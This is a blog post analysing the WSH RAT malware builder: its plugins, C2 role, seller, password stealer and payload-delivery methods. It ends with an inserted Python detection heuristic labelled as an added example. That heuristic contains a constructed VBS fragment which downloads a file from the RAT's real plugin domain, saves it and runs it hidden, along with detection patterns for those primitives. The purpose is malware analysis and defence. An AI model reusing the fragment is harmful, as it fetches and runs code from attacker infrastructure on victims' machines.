Friday, October 4, 2019

WSH RAT - Analysis of the code

Analysis of the code - capabilities of WSH RAT

In a previous post I wrote about the link between WSH RAT and some other crypter services, so in this post I'm going to dig a bit into the code itself.

In essence, WSH RAT generates malicious JS or VBS based on HWorm, and a good write-up about the functionality of version 2.0 of HWorm has recently been done by   in this post, but I will add a couple of interesting things.

WSH RAT builder

I took a look at one of the WSH RAT builders from a few months back (a version from July).
The builder also acts as the C2.

The first interesting aspect is that the malicious payload, which is HWorm (in both VBS and JS form), is included in the resources.

WSH RAT plugins

All the additional plugins (RDP, file manager, offline keylogger, etc.) are fetched from URLs that are hard-coded in the builder itself. This means the plugins are hosted on a system owned by the developer of the builder, so the criminal using the builder has no control over the plugins being pushed to the infected system:

In the post from   the additional plugins are hosted on the domain "doughnut-snack[.]live", which is registered with the account  

Unknow.sales64 is the Skype ID of the person behind the builder, who sells the service on wshsoftware[.]site.

Password stealer

The password stealer capability is based on the PasswordStealer tool from @trestacon on GitHub.

Download and Execute / Upload and Execute

WSH RAT is used to deploy additional malware. As mentioned previously, the builder also acts as the C2.

The additional payload can be pushed in two different ways: downloading the file from an external URL, or uploading the file through the WSH builder. The code for both methods is below:
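The "download from an external URL" delivery path described above, looked at from the detection side, as an added example that is not code from this post or from WSH RAT: a heuristic that flags JS/VBS scripts which combine a remote URL with the Windows Script Host COM objects for fetching, writing and running a file, run over constructed sample fragments. The COM object names are an assumption about the primitives such scripts typically use; the plugin host is the domain named in this post, refanged.

```python
import re
from dataclasses import dataclass, field

# Constructed sample fragments (NOT the RAT's code): one benign admin script and one that
# chains the fetch + write + execute primitives a WSH download-and-execute script relies on.
BENIGN = '''Set fso = CreateObject("Scripting.FileSystemObject")
WScript.Echo fso.GetFolder(".").Path'''

SUSPICIOUS = '''Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://doughnut-snack.live/plugin/rdp", False
http.Send
Set strm = CreateObject("ADODB.Stream")
strm.Write http.responseBody
strm.SaveToFile tmp & "\\p.vbs", 2
CreateObject("WScript.Shell").Run "wscript " & tmp & "\\p.vbs", 0'''

# COM objects grouped by their role in the chain (assumed typical primitives).
PRIMITIVES = {
    "download": r"MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest",
    "write":    r"ADODB\.Stream|Scripting\.FileSystemObject",
    "execute":  r"WScript\.Shell|Shell\.Application",
}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)\S*")
# Plugin host named in the post (refanged so it matches what a script would contain).
KNOWN_PLUGIN_HOSTS = {"doughnut-snack.live"}

@dataclass
class Verdict:
    roles: set = field(default_factory=set)   # chain roles seen in the script
    hosts: set = field(default_factory=set)   # hosts the script reaches out to
    known_c2: bool = False                    # contacts a host tied to the builder
    chain: bool = False                       # download + execute + remote URL present

def assess(script: str) -> Verdict:
    """Heuristically assess a JS/VBS script for a download-and-execute chain."""
    v = Verdict()
    for role, pattern in PRIMITIVES.items():
        if re.search(pattern, script, re.IGNORECASE):
            v.roles.add(role)
    v.hosts = {m.group(1).lower() for m in URL_RE.finditer(script)}
    v.known_c2 = bool(v.hosts & KNOWN_PLUGIN_HOSTS)
    # A fetch primitive plus an execution primitive plus a remote URL is the minimum
    # shape of the "download from external URL" delivery path; either alone is common.
    v.chain = {"download", "execute"} <= v.roles and bool(v.hosts)
    return v

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, assess(sample))
```

The "upload through the builder" path carries the file bytes inside the C2 command instead of a second URL, so for that case the write and execute roles plus the beacon host are the signal, not the URL count.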